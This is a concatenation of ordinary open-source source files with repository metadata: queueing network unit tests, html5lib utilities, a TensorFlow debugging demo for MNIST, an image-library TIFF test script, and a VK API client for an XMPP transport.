plt.switch_backend('Agg')
self.qn.animate(frames=5)
def test_QueueNetwork_blocking(self):
g = nx.random_geometric_graph(100, 0.2).to_directed()
g = qt.set_types_random(g, proportions={k: 1.0 / 6 for k in range(1, 7)})
q_cls = {
1: qt.LossQueue,
2: qt.QueueServer,
3: qt.InfoQueue,
4: qt.ResourceQueue,
5: qt.ResourceQueue,
6: qt.QueueServer
}
q_arg = {
3: {'net_size': g.number_of_edges()},
4: {'num_servers': 500},
6: {'AgentFactory': qt.GreedyAgent}
}
qn = qt.QueueNetwork(g, q_classes=q_cls, q_args=q_arg, seed=17)
qn.blocking = 'RS'
self.assertEqual(qn.blocking, 'RS')
self.assertEqual(qn._blocking, False)
qn.clear()
self.assertEqual(qn._initialized, False)
def test_QueueNetwork_blocking_setter_error(self):
self.qn.blocking = 'RS'
with self.assertRaises(TypeError):
self.qn.blocking = 2
def test_QueueNetwork_closedness(self):
num_events = 2500
ans = np.zeros(num_events, bool)
na = np.zeros(self.qn.nE, int)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
for k in range(num_events):
ans[k] = np.sum(self.qn.num_agents) >= np.sum(na)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
self.qn.simulate(n=1)
self.assertTrue(ans.all())
def test_QueueNetwork_copy(self):
g = nx.random_geometric_graph(100, 0.2).to_directed()
g = qt.set_types_random(g, proportions={k: 0.2 for k in range(1, 6)})
q_cls = {
1: qt.LossQueue,
2: qt.QueueServer,
3: qt.InfoQueue,
4: qt.ResourceQueue,
5: qt.ResourceQueue
}
q_arg = {3: {'net_size': g.number_of_edges()},
4: {'num_servers': 500}}
qn = qt.QueueNetwork(g, q_classes=q_cls, q_args=q_arg, seed=17)
qn.max_agents = np.infty
qn.initialize(queues=range(g.number_of_edges()))
qn.simulate(n=50000)
qn2 = qn.copy()
stamp = [(q.num_arrivals, q.time) for q in qn2.edge2queue]
qn2.simulate(n=25000)
self.assertFalse(qn.current_time == qn2.current_time)
self.assertFalse(qn.time == qn2.time)
ans = []
for k, q in enumerate(qn2.edge2queue):
if stamp[k][1] != q.time:
ans.append(q.time != qn.edge2queue[k].time)
self.assertTrue(np.array(ans).all())
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', True)
def test_QueueNetwork_drawing(self):
scatter_kwargs = {'c': 'b'}
kwargs = {'bgcolor': 'green'}
self.qn.draw(scatter_kwargs=scatter_kwargs, **kwargs)
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=scatter_kwargs,
line_kwargs=None, **kwargs)
self.qn.draw(scatter_kwargs=scatter_kwargs)
bgcolor = self.qn.colors['bgcolor']
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=scatter_kwargs,
line_kwargs=None, bgcolor=bgcolor)
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', False)
def test_QueueNetwork_drawing_importerror(self):
with self.assertRaises(ImportError):
self.qn.draw()
def test_QueueNetwork_drawing_animation_error(self):
self.qn.clear()
with self.assertRaises(qt.QueueingToolError):
self.qn.animate()
self.qn.initialize()
with mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', False):
with self.assertRaises(ImportError):
self.qn.animate()
def test_QueueNetwork_init_error(self):
g = qt.generate_pagerank_graph(7)
with self.assertRaises(TypeError):
qt.QueueNetwork(g, blocking=2)
def test_QueueNetwork_get_agent_data(self):
self.qn.clear()
self.qn.initialize(queues=1)
self.qn.start_collecting_data()
self.qn.simulate(n=20000)
data = self.qn.get_agent_data()
dat0 = data[(1, 0)]
a = dat0[:, 0]
b = dat0[dat0[:, 1] > 0, 1]
c = dat0[dat0[:, 2] > 0, 2]
a.sort()
b.sort()
c.sort()
self.assertTrue((a == dat0[:, 0]).all())
self.assertTrue((b == dat0[dat0[:, 1] > 0, 1]).all())
self.assertTrue((c == dat0[dat0[:, 2] > 0, 2]).all())
self.assertTrue((dat0[1:, 0] == dat0[dat0[:, 2] > 0, 2]).all())
def test_QueueNetwork_get_queue_data(self):
g = nx.random_geometric_graph(50, 0.5).to_directed()
q_cls = {1: qt.QueueServer}
qn = qt.QueueNetwork(g, q_classes=q_cls, seed=17)
k = np.random.randint(10000, 20000)
qn.max_agents = 4000
qn.initialize(queues=range(qn.nE))
qn.start_collecting_data()
qn.simulate(n=k)
data = qn.get_queue_data()
self.assertEqual(data.shape, (k, 6))
qn.stop_collecting_data()
qn.clear_data()
ans = np.array([q.data == {} for q in qn.edge2queue])
self.assertTrue(ans.all())
def test_QueueNetwork_greedy_routing(self):
lam = np.random.randint(1, 10) + 0.0
rho = np.random.uniform(0.75, 1)
nSe = np.random.randint(1, 10)
mu = lam / (3 * rho * nSe)
def arr(t):
return t + np.random.exponential(1 / lam)
def ser(t):
return t + np.random.exponential(1 / mu)
def ser_id(t):
return t
adj = {
0: {1: {'edge_type': 1}},
1: {
2: {'edge_type': 2},
3: {'edge_type': 2},
4: {'edge_type': 2}
}
}
g = qt.adjacency2graph(adj)
qcl = {1: qt.QueueServer, 2: qt.QueueServer}
arg = {
1: {
'arrival_f': arr,
'service_f': ser_id,
'AgentFactory': qt.GreedyAgent
},
2: {
'service_f': ser,
'num_servers': nSe
}
}
qn = qt.QueueNetwork(g, q_classes=qcl, q_args=arg)
qn.initialize(edges=(0, 1))
qn.max_agents = 5000
num_events = 1000
ans = np.zeros(num_events, bool)
e01 = qn.g.edge_index[(0, 1)]
edg = qn.edge2queue[e01].edge
c = 0
while c < num_events:
qn.simulate(n=1)
if qn.next_event_description() == ('Departure', e01):
d0 = qn.edge2queue[e01]._departures[0].desired_destination(qn, edg)
a1 = np.argmin([qn.edge2queue[e].number_queued() for e in qn.out_edges[1]])
d1 = qn.out_edges[1][a1]
ans[c] = d0 == d1
c += 1
self.assertTrue(ans.all())
def test_QueueNetwork_initialize_Error(self):
self.qn.clear()
with self.assertRaises(ValueError):
self.qn.initialize(nActive=0)
with self.assertRaises(TypeError):
self.qn.initialize(nActive=1.6)
_get_queues_mock = mock.Mock()
_get_queues_mock.return_value = []
mock_location = 'queueing_tool.network.queue_network._get_queues'
with mock.patch(mock_location, _get_queues_mock):
with self.assertRaises(qt.QueueingToolError):
self.qn.initialize(edge_type=1)
def test_QueueNetwork_initialization(self):
# Single edge index
k = np.random.randint(0, self.qn.nE)
self.qn.clear()
self.qn.initialize(queues=k)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertEqual(ans, [k])
# Multiple edge indices
k = np.unique(np.random.randint(0, self.qn.nE, 5))
self.qn.clear()
self.qn.initialize(queues=k)
ans = np.array([q.edge[2] for q in self.qn.edge2queue if q.active])
ans.sort()
self.assertTrue((ans == k).all())
# Single edge as edge
k = np.random.randint(0, self.qn.nE)
e = self.qn.edge2queue[k].edge[:2]
self.qn.clear()
self.qn.initialize(edges=e)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertEqual(ans, [k])
# Single edge as tuple
k = np.random.randint(0, self.qn.nE)
e = self.qn.edge2queue[k].edge[:2]
self.qn.clear()
self.qn.initialize(edges=e)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertEqual(ans, [k])
# Multiple edges as tuples
k = np.unique(np.random.randint(0, self.qn.nE, 5))
es = [self.qn.edge2queue[i].edge[:2] for i in k]
self.qn.clear()
self.qn.initialize(edges=es)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertTrue((ans == k).all())
# Multple edges as edges
k = np.unique(np.random.randint(0, self.qn.nE, 5))
es = [self.qn.edge2queue[i].edge[:2] for i in k]
self.qn.clear()
self.qn.initialize(edges=es)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertTrue((ans == k).all())
# Single edge_type
k = np.random.randint(1, 4)
self.qn.clear()
self.qn.initialize(edge_type=k)
ans = np.array([q.edge[3] == k for q in self.qn.edge2queue if q.active])
self.assertTrue(ans.all())
# Multiple edge_types
k = np.unique(np.random.randint(1, 4, 3))
self.qn.clear()
self.qn.initialize(edge_type=k)
ans = np.array([q.edge[3] in k for q in self.qn.edge2queue if q.active])
self.assertTrue(ans.all())
self.qn.clear()
self.qn.max_agents = 3
self.qn.initialize(nActive=self.qn.num_edges)
ans = np.array([q.active for q in self.qn.edge2queue])
self.assertEqual(ans.sum(), 3)
def test_QueueNetwork_max_agents(self):
num_events = 1500
self.qn.max_agents = 200
ans = np.zeros(num_events, bool)
for k in range(num_events // 2):
ans[k] = np.sum(self.qn.num_agents) <= self.qn.max_agents
self.qn.simulate(n=1)
self.qn.simulate(n=20000)
for k in range(num_events // 2, num_events):
ans[k] = np.sum(self.qn.num_agents) <= self.qn.max_agents
self.qn.simulate(n=1)
self.assertTrue(ans.all())
def test_QueueNetwork_properties(self):
self.qn.clear()
self.assertEqual(self.qn.time, np.infty)
self.assertEqual(self.qn.num_edges, self.qn.nE)
self.assertEqual(self.qn.num_vertices, self.qn.nV)
self.assertEqual(self.qn.num_nodes, self.qn.nV)
def test_QueueNetwork_set_transitions_Error(self):
with self.assertRaises(ValueError):
self.qn.set_transitions({-1: {0: 0.75, 1: 0.25}})
with self.assertRaises(ValueError):
self.qn.set_transitions({self.qn.nV: {0: 0.75, 1: 0.25}})
with self.assertRaises(ValueError):
self.qn.set_transitions({0: {0: 0.75, 1: -0.25}})
with self.assertRaises(ValueError):
self.qn.set_transitions({0: {0: 1.25, 1: -0.25}})
mat = np.zeros((2, 2))
with self.assertRaises(ValueError):
self.qn.set_transitions(mat)
mat = np.zeros((self.qn.nV, self.qn.nV))
with self.assertRaises(ValueError):
self.qn.set_transitions(mat)
mat[0, 0] = -1
mat[0, 1] = 2
with self.assertRaises(ValueError):
self.qn.set_transitions(mat)
mat = 1
with self.assertRaises(TypeError):
self.qn.set_transitions(mat)
def test_QueueNetwork_simulate(self):
g = qt.generate_pagerank_graph(50)
qn = qt.QueueNetwork(g)
qn.max_agents = 2000
qn.initialize(50)
t0 = np.random.uniform(30, 50)
qn.max_agents = 2000
qn.simulate(t=t0)
self.assertGreater(qn.current_time, t0)
def test_QueueNetwork_simulate_error(self):
self.qn.clear()
with self.assertRaises(qt.QueueingToolError):
self.qn.simulate()
def test_QueueNetwork_simulate_slow(self):
e = self.qn._fancy_heap.array_edges[0]
edge = self.qn.edge2queue[e].edge
if edge[0] == edge[1]:
for q in self.qn.edge2queue:
if q.edge[0] != q.edge[1]:
break
self.qn._simulate_next_event(slow=True)
else:
for q in self.qn.edge2queue:
if q.edge[0] == q.edge[1]:
break
self.qn._simulate_next_event(slow=True)
self.qn.clear()
self.qn.initialize(queues=[q.edge[2]])
e = self.qn._fancy_heap.array_edges[0]
edge = self.qn.edge2queue[e].edge
loop = edge[0] == edge[1]
self.qn._simulate_next_event(slow=True)
while True:
e = self.qn._fancy_heap.array_edges[0]
edge = self.qn.edge2queue[e].edge
if (edge[0] != edge[1]) == loop:
self.qn._simulate_next_event(slow=True)
break
else:
self.qn._simulate_next_event(slow=False)
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', True)
def test_QueueNetwork_show_type(self):
args = {'c': 'b', 'bgcolor': 'green'}
self.qn.show_type(edge_type=2, **args)
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=None,
line_kwargs=None, **args)
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', True)
def test_QueueNetwork_show_active(self):
args = {
'fname': 'types.png',
'figsize': (3, 3),
'bgcolor': 'green'
}
self.qn.show_active(**args)
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=None,
line_kwargs=None, **args)
def test_QueueNetwork_sorting(self):
num_events = 2000
ans = np.zeros(num_events, bool)
for k in range(num_events // 2):
queue_times = [q.time for q in self.qn.edge2queue]
queue_times.sort()
tmp = queue_times[0]
self.qn.simulate(n=1)
ans[k] = (tmp == self.qn._qkey[0])
self.qn.simulate(n=10000)
for k in range(num_events // 2, num_events):
queue_times = [q.time for q in self.qn.edge2queue]
queue_times.sort()
tmp = queue_times[0]
self.qn.simulate(n=1)
ans[k] = (tmp == self.qn._qkey[0])
self.assertTrue(ans.all())
def test_QueueNetwork_transitions(self):
degree = [len(self.qn.out_edges[k]) for k in range(self.qn.nV)]
v, deg = np.argmax(degree), max(degree)
out_edges = sorted(self.qn.g.out_edges(v))
trans = np.random.uniform(size=deg)
trans = trans / sum(trans)
probs = {v: {e[1]: p for e, p in zip(out_edges, trans)}}
self.qn.set_transitions(probs)
mat = self.qn.transitions()
tra = mat[v, [e[1] for e in out_edges]]
self.assertTrue((tra == trans).all())
tra = self.qn.transitions(return_matrix=False)
tra = np.array([tra[v][e[1]] for e in out_edges])
self.assertTrue((tra == trans).all())
mat = qt.generate_transition_matrix(self.g)
self.qn.set_transitions(mat)
tra = self.qn.transitions()
self.assertTrue(np.allclose(tra, mat))
mat = qt.generate_transition_matrix(self.g)
self.qn.set_transitions({v: {e[1]: mat[e] for e in out_edges}})
tra = self.qn.transitions()
self.assertTrue(np.allclose(tra[v], mat[v]))
|
mit
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/pip/_vendor/html5lib/utils.py
|
436
|
3267
|
from __future__ import absolute_import, division, unicode_literals
from types import ModuleType
from pip._vendor.six import text_type
try:
import xml.etree.cElementTree as default_etree
except ImportError:
import xml.etree.ElementTree as default_etree
__all__ = ["default_etree", "MethodDispatcher", "isSurrogatePair",
"surrogatePairToCodepoint", "moduleFactoryFactory",
"supports_lone_surrogates"]
# Platforms not supporting lone surrogates (\uD800-\uDFFF) should be
# caught by the below test. In general this would be any platform
# using UTF-16 as its encoding of unicode strings, such as
# Jython. This is because UTF-16 itself is based on the use of such
# surrogates, and there is no mechanism to further escape such
# escapes.
try:
_x = eval('"\\uD800"')
if not isinstance(_x, text_type):
# We need this with u"" because of http://bugs.jython.org/issue2039
_x = eval('u"\\uD800"')
assert isinstance(_x, text_type)
except:
supports_lone_surrogates = False
else:
supports_lone_surrogates = True
class MethodDispatcher(dict):
"""Dict with 2 special properties:
On initiation, keys that are lists, sets or tuples are converted to
multiple keys so accessing any one of the items in the original
list-like object returns the matching value
md = MethodDispatcher({("foo", "bar"):"baz"})
md["foo"] == "baz"
A default value which can be set through the default attribute.
"""
def __init__(self, items=()):
# Using _dictEntries instead of directly assigning to self is about
# twice as fast. Please do careful performance testing before changing
# anything here.
_dictEntries = []
for name, value in items:
if type(name) in (list, tuple, frozenset, set):
for item in name:
_dictEntries.append((item, value))
else:
_dictEntries.append((name, value))
dict.__init__(self, _dictEntries)
self.default = None
def __getitem__(self, key):
return dict.get(self, key, self.default)
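# Illustrative usage (hypothetical handlers): iterable keys expand to one
# entry per item, and lookups of unknown keys return the instance's
# `default` attribute instead of raising KeyError.
#   md = MethodDispatcher([(("img", "image"), "media"), ("p", "text")])
#   md["img"]      # -> "media"
#   md["span"]     # -> None until md.default is assigned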
# Some utility functions to deal with weirdness around UCS2 vs UCS4
# python builds
def isSurrogatePair(data):
return (len(data) == 2 and
ord(data[0]) >= 0xD800 and ord(data[0]) <= 0xDBFF and
ord(data[1]) >= 0xDC00 and ord(data[1]) <= 0xDFFF)
def surrogatePairToCodepoint(data):
char_val = (0x10000 + (ord(data[0]) - 0xD800) * 0x400 +
(ord(data[1]) - 0xDC00))
return char_val
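# Worked example of the arithmetic above: the pair u"\uD83D\uDE00" gives
# 0x10000 + (0xD83D - 0xD800) * 0x400 + (0xDE00 - 0xDC00) = 0x1F600,
# i.e. the single code point U+1F600.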
# Module Factory Factory (no, this isn't Java, I know)
# Here to stop this being duplicated all over the place.
def moduleFactoryFactory(factory):
moduleCache = {}
def moduleFactory(baseModule, *args, **kwargs):
if isinstance(ModuleType.__name__, type("")):
name = "_%s_factory" % baseModule.__name__
else:
name = b"_%s_factory" % baseModule.__name__
if name in moduleCache:
return moduleCache[name]
else:
mod = ModuleType(name)
objs = factory(baseModule, *args, **kwargs)
mod.__dict__.update(objs)
moduleCache[name] = mod
return mod
return moduleFactory
|
agpl-3.0
|
gunan/tensorflow
|
tensorflow/python/debug/examples/v2/debug_mnist_v2.py
|
4
|
7614
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Demo of the tfdbg curses CLI: Locating the source of bad numerical values with TF v2.
This demo contains a classical example of a neural network for the mnist
dataset, but modifications are made so that problematic numerical values (infs
and nans) appear in nodes of the graph during training.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import absl
import tensorflow.compat.v2 as tf
IMAGE_SIZE = 28
HIDDEN_SIZE = 500
NUM_LABELS = 10
# If we set the weights randomly, the model will converge normally about half
# the time. We need a seed to ensure that the bad numerical values issue
# appears.
RAND_SEED = 42
tf.compat.v1.enable_v2_behavior()
FLAGS = None
def parse_args():
"""Parses commandline arguments.
Returns:
A tuple (parsed, unparsed) of the parsed object and a group of unparsed
arguments that did not match the parser.
"""
parser = argparse.ArgumentParser()
parser.register("type", "bool", lambda v: v.lower() == "true")
parser.add_argument(
"--max_steps",
type=int,
default=10,
help="Number of steps to run trainer.")
parser.add_argument(
"--train_batch_size",
type=int,
default=100,
help="Batch size used during training.")
parser.add_argument(
"--learning_rate",
type=float,
default=0.025,
help="Initial learning rate.")
parser.add_argument(
"--data_dir",
type=str,
default="/tmp/mnist_data",
help="Directory for storing data")
parser.add_argument(
"--fake_data",
type="bool",
nargs="?",
const=True,
default=False,
help="Use fake MNIST data for unit testing")
parser.add_argument(
"--check_numerics",
type="bool",
nargs="?",
const=True,
default=False,
help="Use tfdbg to track down bad values during training. "
"Mutually exclusive with the --dump_dir flag.")
parser.add_argument(
"--dump_dir",
type=str,
default=None,
help="Dump TensorFlow program debug data to the specified directory. "
"The dumped data contains information regarding tf.function building, "
"execution of ops and tf.functions, as well as their stack traces and "
"associated source-code snapshots. "
"Mutually exclusive with the --check_numerics flag.")
parser.add_argument(
"--dump_tensor_debug_mode",
type=str,
default="NO_TENSOR",
help="Mode for dumping tensor values. Options: NO_TENSOR, CURT_HEALTH, "
"CONCISE_HEALTH, SHAPE, FULL_TENSOR. This is relevant only when "
"--dump_dir is set.")
# TODO(cais): Add more tensor debug mode strings once they are supported.
parser.add_argument(
"--dump_circular_buffer_size",
type=int,
default=1000,
help="Size of the circular buffer used to dump execution events. "
"This is relevant only when --dump_dir is set.")
parser.add_argument(
"--use_random_config_path",
type="bool",
nargs="?",
const=True,
default=False,
help="""If set, set config file path to a random file in the temporary
directory.""")
return parser.parse_known_args()
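# Example invocations (illustrative, using only the flags defined above):
#   python debug_mnist_v2.py --check_numerics
#   python debug_mnist_v2.py --dump_dir=/tmp/tfdbg2_logdir \
#       --dump_tensor_debug_mode=CONCISE_HEALTH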
def main(_):
if FLAGS.check_numerics and FLAGS.dump_dir:
raise ValueError(
"The --check_numerics and --dump_dir flags are mutually "
"exclusive.")
if FLAGS.check_numerics:
tf.debugging.enable_check_numerics()
elif FLAGS.dump_dir:
tf.debugging.experimental.enable_dump_debug_info(
FLAGS.dump_dir,
tensor_debug_mode=FLAGS.dump_tensor_debug_mode,
circular_buffer_size=FLAGS.dump_circular_buffer_size)
# Import data
if FLAGS.fake_data:
imgs = tf.random.uniform(maxval=256, shape=(1000, 28, 28), dtype=tf.int32)
labels = tf.random.uniform(maxval=10, shape=(1000,), dtype=tf.int32)
mnist_train = imgs, labels
mnist_test = imgs, labels
else:
mnist_train, mnist_test = tf.keras.datasets.mnist.load_data()
@tf.function
def format_example(imgs, labels):
"""Formats each training and test example to work with our model."""
imgs = tf.reshape(imgs, [-1, 28 * 28])
imgs = tf.cast(imgs, tf.float32) / 255.0
labels = tf.one_hot(labels, depth=10, dtype=tf.float32)
return imgs, labels
train_ds = tf.data.Dataset.from_tensor_slices(mnist_train).shuffle(
FLAGS.train_batch_size * FLAGS.max_steps,
seed=RAND_SEED).batch(FLAGS.train_batch_size)
train_ds = train_ds.map(format_example)
test_ds = tf.data.Dataset.from_tensor_slices(mnist_test).repeat().batch(
len(mnist_test[0]))
test_ds = test_ds.map(format_example)
def get_dense_weights(input_dim, output_dim):
"""Initializes the parameters for a single dense layer."""
initial_kernel = tf.keras.initializers.TruncatedNormal(
mean=0.0, stddev=0.1, seed=RAND_SEED)
kernel = tf.Variable(initial_kernel([input_dim, output_dim]))
bias = tf.Variable(tf.constant(0.1, shape=[output_dim]))
return kernel, bias
@tf.function
def dense_layer(weights, input_tensor, act=tf.nn.relu):
"""Runs the forward computation for a single dense layer."""
kernel, bias = weights
preactivate = tf.matmul(input_tensor, kernel) + bias
activations = act(preactivate)
return activations
# init model
hidden = get_dense_weights(IMAGE_SIZE**2, HIDDEN_SIZE)
logits = get_dense_weights(HIDDEN_SIZE, NUM_LABELS)
variables = hidden + logits
@tf.function
def model(x):
"""Feed forward function of the model.
Args:
x: a (?, 28*28) tensor consisting of the feature inputs for a batch of
examples.
Returns:
A (?, 10) tensor containing the class scores for each example.
"""
hidden_act = dense_layer(hidden, x)
logits_act = dense_layer(logits, hidden_act, tf.identity)
y = tf.nn.softmax(logits_act)
return y
@tf.function
def loss(logits, labels):
"""Calculates cross entropy loss."""
diff = -(labels * tf.math.log(logits))
loss = tf.reduce_mean(diff)
return loss
train_batches = iter(train_ds)
test_batches = iter(test_ds)
optimizer = tf.optimizers.Adam(learning_rate=FLAGS.learning_rate)
for i in range(FLAGS.max_steps):
x_train, y_train = next(train_batches)
x_test, y_test = next(test_batches)
# Train Step
with tf.GradientTape() as tape:
y = model(x_train)
loss_val = loss(y, y_train)
grads = tape.gradient(loss_val, variables)
optimizer.apply_gradients(zip(grads, variables))
# Evaluation Step
y = model(x_test)
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_test, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print("Accuracy at step %d: %s" % (i, accuracy.numpy()))
if __name__ == "__main__":
FLAGS, unparsed = parse_args()
absl.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
apache-2.0
|
sambler/oiio
|
testsuite/tiff-depths/run.py
|
4
|
2847
|
#!/usr/bin/env python
# FIXME -- eventually, we want more (all?) of these to work
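# Note: `parent`, `command`, and `rw_command` are not defined in this file;
# they are presumably injected by the OIIO testsuite runner that executes
# this script, which is why the code below can use them directly.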
imagedir = parent + "/libtiffpic/depth"
files = [
"flower-minisblack-02.tif", # 73x43 2-bit minisblack gray image
"flower-minisblack-04.tif", # 73x43 4-bit minisblack gray image
"flower-minisblack-06.tif", # 73x43 6-bit minisblack gray image
"flower-minisblack-08.tif", # 73x43 8-bit minisblack gray image
"flower-minisblack-10.tif", # 73x43 10-bit minisblack gray image
"flower-minisblack-12.tif", # 73x43 12-bit minisblack gray image
"flower-minisblack-14.tif", # 73x43 14-bit minisblack gray image
"flower-minisblack-16.tif", # 73x43 16-bit minisblack gray image
#FIXME "flower-minisblack-24.tif", # 73x43 24-bit minisblack gray image
#FIXME "flower-minisblack-32.tif", # 73x43 32-bit minisblack gray image
"flower-palette-02.tif", #73x43 4-entry colormapped image
"flower-palette-04.tif", #73x43 16-entry colormapped image
"flower-palette-08.tif", #73x43 256-entry colormapped image
#FIXME "flower-palette-16.tif", # 73x43 65536-entry colormapped image
"flower-rgb-contig-02.tif", # 73x43 2-bit contiguous RGB image
"flower-rgb-contig-04.tif", # 73x43 4-bit contiguous RGB image
"flower-rgb-contig-08.tif", # 73x43 8-bit contiguous RGB image
"flower-rgb-contig-10.tif", # 73x43 10-bit contiguous RGB image
"flower-rgb-contig-12.tif", # 73x43 12-bit contiguous RGB image
"flower-rgb-contig-14.tif", # 73x43 14-bit contiguous RGB image
"flower-rgb-contig-16.tif", # 73x43 16-bit contiguous RGB image
#FIXME "flower-rgb-contig-24.tif", # 73x43 24-bit contiguous RGB image
#FIXME "flower-rgb-contig-32.tif", # 73x43 32-bit contiguous RGB image
"flower-rgb-planar-02.tif", # 73x43 2-bit seperated RGB image
"flower-rgb-planar-04.tif", # 73x43 4-bit seperated RGB image
"flower-rgb-planar-08.tif", # 73x43 8-bit seperated RGB image
"flower-rgb-planar-10.tif", # 73x43 10-bit seperated RGB image
"flower-rgb-planar-12.tif", # 73x43 12-bit seperated RGB image
"flower-rgb-planar-14.tif", # 73x43 14-bit seperated RGB image
"flower-rgb-planar-16.tif" # 73x43 16-bit seperated RGB image
#FIXME "flower-rgb-planar-24.tif", # 73x43 24-bit seperated RGB image
#FIXME "flower-rgb-planar-32.tif", # 73x43 32-bit seperated RGB image
#FIXME "flower-separated-contig-08.tif", # 73x43 8-bit contiguous CMYK image
#FIXME "flower-separated-contig-16.tif", # 73x43 16-bit contiguous CMYK image
#FIXME "flower-separated-planar-08.tif", # 73x43 8-bit separated CMYK image
#FIXME "flower-separated-planar-16.tif", # 73x43 16-bit separated CMYK image
]
for f in files:
command += rw_command (imagedir, f)
print ("COMMAND= " + command)
|
bsd-3-clause
|
cydev/cyvk
|
api/vkapi.py
|
1
|
5829
|
from __future__ import unicode_literals
import time
from compat import text_type, get_logger, requests, json
from config import MAX_API_RETRY, API_MAXIMUM_RATE, TRANSPORT_ID
from .errors import (api_errors, UnknownError, IncorrectApiResponse, TooManyRequestsPerSecond, AuthenticationException,
InvalidTokenError)
from .messages import MessagesApi
from .api import method_wrapper
from .parsing import escape_name
from .polling import LongPolling
from cystanza.stanza import ChatMessage
VK_ERROR_BURST = 6
WAIT_RATE = 2.
_logger = get_logger()
class Api(object):
URL = 'https://api.vk.com/method/%s'
VERSION = '3.0'
def __init__(self, user):
self.user = user
self.jid = user.jid
self.messages = MessagesApi(self)
self.last_method_time = 0
self.polling = LongPolling(self)
@property
def token(self):
return self.user.token
def _method(self, method_name, args=None, additional_timeout=0, retry=0):
"""
Makes a POST request to the VK API with burst protection and exception handling
@type method_name: text_type
@param method_name: vk api method name
@param args: method parameters
@param additional_timeout: time in seconds to wait before reattempting
"""
assert isinstance(method_name, text_type)
if retry > MAX_API_RETRY:
raise IncorrectApiResponse('reached max api retry for %s, %s' % (method_name, self.jid))
args = args or {}
args.update({'v': self.VERSION, 'access_token': self.token})
_logger.debug('calling api method %s, arguments: %s' % (method_name, args))
time.sleep(additional_timeout)
now = time.time()
diff = now - self.last_method_time
if diff < API_MAXIMUM_RATE:
_logger.debug('burst protected')
time.sleep(abs(diff - API_MAXIMUM_RATE))
self.last_method_time = now
try:
response = requests.post(self.URL % method_name, args)
if response.status_code != 200:
raise requests.HTTPError('incorrect response status code')
body = json.loads(response.text)
_logger.debug('got: %s' % body)
if 'response' in body:
return body['response']
if 'error' in body and 'error_code' in body['error']:
code = body['error']['error_code']
raise api_errors.get(code, UnknownError())
raise NotImplementedError('unable to process %s' % body)
except (requests.RequestException, ValueError) as e:
_logger.error('method error: %s' % e)
additional_timeout = additional_timeout or 1
except TooManyRequestsPerSecond:
additional_timeout = additional_timeout or API_MAXIMUM_RATE / WAIT_RATE
additional_timeout *= WAIT_RATE
return self._method(method_name, args, additional_timeout, retry + 1)
@method_wrapper
def method(self, method_name, args=None, raise_auth=False):
"""Call method with error handling"""
try:
return self._method(method_name, args)
# except CaptchaNeeded:
# _logger.error('captcha challenge for %s' % self.jid)
# raise NotImplementedError('captcha')
except AuthenticationException as e:
self.user.transport.send(ChatMessage(TRANSPORT_ID, self.jid, 'Authentication error: %s' % e))
# except NotAllowed:
# friend_jid = get_friend_jid(args.get('user_id', TRANSPORT_ID))
# text = "You're not allowed to perform this action"
# push(ChatMessage(friend_jid, self.jid, text))
# except AccessRevokedError:
# _logger.debug('user %s revoked access' % self.jid)
# push(ChatMessage(TRANSPORT_ID, self.jid, "You've revoked access and will be unregistered from transport"))
# database.remove_user(self.jid)
# realtime.remove_online_user(self.jid)
except InvalidTokenError:
self.user.transport.send((ChatMessage(TRANSPORT_ID, self.jid, 'Your token is invalid. Register again')))
except NotImplementedError as e:
self.user.transport.send((ChatMessage(TRANSPORT_ID, self.jid, 'Feature not implemented: %s' % e)))
if raise_auth:
raise AuthenticationException()
@method_wrapper
def get(self, uid, fields=None):
fields = fields or ['screen_name']
args = dict(fields=','.join(fields), user_ids=uid)
data = self.method('users.get', args)[0]
data['name'] = escape_name('', u'%s %s' % (data['first_name'], data['last_name']))
del data['first_name'], data['last_name']
return data
@method_wrapper
def set_online(self):
self.method("account.setOnline")
@method_wrapper
def get_friends(self, fields=None, online=None):
fields = fields or ["screen_name"]
method_name = "friends.get"
if online:
method_name = "friends.getOnline"
friends_raw = self.method(method_name, {"fields": ",".join(fields)}) or {}
friends = {}
for friend in friends_raw:
uid = friend["uid"]
name = escape_name("", u"%s %s" % (friend["first_name"], friend["last_name"]))
friends[uid] = {"name": name, "online": friend["online"]}
for key in fields:
if key != "screen_name":
friends[uid][key] = friend.get(key)
return friends
@method_wrapper
def is_application_user(self):
"""Check if client is application user and validate token"""
try:
self.method('isAppUser', raise_auth=True)
return True
except AuthenticationException:
return False
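# Added usage sketch (not part of the original module): a hypothetical caller,
# assuming a `user` object with `jid`, `token` and `transport` attributes is
# provided by the rest of the transport code.
#
#   api = Api(user)
#   if api.is_application_user():
#       api.set_online()
#       friends = api.get_friends(online=True)   # {uid: {'name': ..., 'online': ...}}
#       profile = api.get(some_uid)              # 'name' built from first/last name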
|
mit
|
NetApp/cinder
|
cinder/db/sqlalchemy/migrate_repo/versions/062_deleted_type_to_Integer.py
|
11
|
1215
|
